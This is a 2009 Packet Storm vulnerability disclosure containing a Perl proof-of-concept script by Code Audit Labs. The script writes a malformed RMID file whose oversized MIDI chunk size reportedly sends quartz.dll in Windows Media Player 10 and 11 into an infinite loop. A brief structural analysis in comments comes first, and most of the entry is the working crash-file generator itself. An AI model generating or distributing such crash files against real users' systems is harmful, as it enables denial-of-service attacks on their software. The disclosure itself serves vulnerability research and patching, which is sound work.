Microsoft Media Player Denial Of Service

2009-04-17T00:00:00
ID PACKETSTORM:76771
Type packetstorm
Reporter vulnhunt.com
Modified 2009-04-17T00:00:00

Description

                                        
                                            `#! /usr/bin/perl  
# CAL_quartz_mid_poc.pl  
#  
# MircoSoft_Media_player_quartz.dll_mid_remote_Dos POC  
# by Code Audit Labs public 2009-04-17  
# http://www.vulnhunt.com/  
#  
#Affected  
#========  
#test on full updated winxp sp3  
#windows media Player 10.00.00.3998 quartz.dll 6.5.3790.4283  
#Windows Media Player 11.0.5721.5230 quartz.dll 6.5.2600.5596  
  
#other version should be affected  
  
# CVE: please assign to this a CVE id   
#  
#ANALYSIS  
#========  
# one vulnerability exists within the quartz.dll code processing RMID header  
#the struct have following  
#{  
# char riff_id[4]; //'RIFF'  
# DWORD rmid_size;  
# char rmid_id[4]; //'RMID'  
# char data_id[4]; //no eq data  
# DWORD midi_size;   
#}  
#if data_id is not 'data' , and midi_size is 0xfffffff8.  
#the code would fall into infinity loop.  
  
#  
  
open(Fin, ">poc.mid") || die "can't create crash sample.$!";  
binmode(Fin);  
$data =   
"\x52\x49\x46\x46\xff\xff\x00\x00\x52\x4d\x49\x44\x64\x64\x64\x64" .  
"\xf8\xff\xff\xff\x4d\x54\x68\x64\xff\xff\xff\xff\xf8\xff\xff\xf8" .  
"\xf8\xff\xff\xff\xf7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" .  
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" .  
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";  
  
print Fin $data;  
  
close(Fin);  
  
  
`